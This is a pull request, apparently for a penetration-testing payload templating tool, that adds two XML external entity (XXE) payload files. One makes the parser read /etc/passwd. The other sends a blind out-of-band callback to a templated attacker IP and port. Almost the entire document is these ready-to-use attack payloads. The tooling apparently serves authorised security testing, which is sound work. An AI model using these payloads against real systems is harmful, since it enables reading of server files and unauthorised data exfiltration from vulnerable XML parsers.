### PR TITLE
feat(templates): adds basic XXE payloads

### DIFF
--- a/src/profi/templates/payloads/xxe-etc-passwd
+++ b/src/profi/templates/payloads/xxe-etc-passwd
@@ -1,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
+<bar>&ent;</bar>

--- a/src/profi/templates/payloads/xxe-out-of-band
+++ b/src/profi/templates/payloads/xxe-out-of-band
@@ -1,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [ <!ENTITY ent SYSTEM "http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/outofbounds"> ]>
+<bar>&ent;</bar>


### PR DESCRIPTION
This commit adds two XXE payloads, one file `/etc/passwd` file inclusion, and one out-of-band callback to cover blind XXEs